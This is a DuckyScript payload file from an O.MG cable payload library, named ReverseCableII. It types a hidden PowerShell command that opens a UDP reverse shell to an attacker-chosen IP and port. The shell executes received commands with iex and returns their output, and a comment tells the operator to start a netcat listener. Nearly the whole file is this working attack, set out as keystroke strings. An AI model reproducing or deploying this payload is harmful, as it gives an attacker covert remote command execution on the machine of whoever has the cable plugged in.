omg-payloads/payloads/library/remote_access/ReverseCable II/payload.txt

29 lines
1.1 KiB
Plaintext
Raw Normal View History

REM ReverseCableII
REM Version 1.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
2024-05-28 17:28:14 +00:00
REM Author: 0i41E
REM UDP Reverse shell, based on ReverseDuckyIII, executed in the background. Might create a firewall pop up, but will execute anyway.
REM Fill in Attacker-IP and Port in Line 20
REM DON'T FORGET TO START LISTENER: nc -ulv -p PORT
DELAY 500
DUCKY_LANG de
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER
DELAY 200
STRING $E=New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("0.0.0.0"),PORT);$C=New-Object System.Net.So
DELAY 100
STRING ckets.UDPClient(53);[byte[]]$B=0..65535|%{0};$SB=([text.encoding]::ASCII).GetBytes('ReverseCableII:');$C.Send($SB,$S
DELAY 100
STRING B.Length,$E);while($true){;$R=$C.Receive([ref]$E);$RD=([text.encoding]::ASCII).GetString($R);$s=(iex $RD 2>&1 | Out-S
DELAY 100
STRING tring );$s2=$s+'O.MG@PS ' + (pwd).Path + '> ';$SB =([text.encoding]::ASCII).GetBytes($s2);$C.Send($SB,$SB.Len
DELAY 100
STRING gth,$E)};$C.Close()
ENTER